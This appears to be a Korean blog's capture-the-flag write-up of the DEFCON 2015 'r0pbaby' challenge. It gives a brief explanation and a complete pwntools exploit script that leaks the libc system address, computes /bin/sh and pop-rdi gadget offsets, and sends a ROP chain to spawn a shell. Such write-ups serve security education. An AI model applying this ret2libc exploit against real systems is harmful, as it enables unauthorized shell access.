티스토리 뷰

Pwnable/write up

[DEFCON 2015] r0pbaby

xxvd 2018. 9. 16. 13:27

PIE, NX가 걸려있다. 2번 메뉴에서 system 함수의 주소를 구하고 offset을 바탕으로

/bin/sh, gadget의 주소를 구해 익스 할 수 있따.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
 
= process('./r0pbaby')
#context(arch='amd64',os='linux',endian='little',log_level='debug')
 
p.sendlineafter(': ','2')
p.sendlineafter('symbol: ','system')
 
p.recvuntil("Symbol system: ")
system = int(p.recv(18),16)
 
 
binsh = system + 0x1479c7 # offset = binsh - system
 
POP_RDI_RET =  system - 0x2428e # offset = system offset - gadgt offset
 
log.success("system : "+hex(system))
log.success("binsh : "+hex(binsh))
log.success("POP RDI RET : "+hex(POP_RDI_RET))
 
p.sendlineafter(': ','3')
p.sendlineafter('max 1024): ','32')
 
payload="A"*8
payload+=p64(POP_RDI_RET)
payload+=p64(binsh)
payload+=p64(system)
 
p.sendline(payload)
 
p.interactive()
 
cs


'Pwnable > write up' 카테고리의 다른 글

P.W.N ctf write up  (0) 2018.11.04
[PlaidCTF 2014] kappa  (0) 2018.09.26
[Sunrin Internel CTF] cee  (0) 2018.09.16
[PlaidCTF 2013] ropasaurusrex  (0) 2018.09.16
[Codegate2018_quals] BaskinRobins31  (0) 2018.09.16
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
TAG
more
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
글 보관함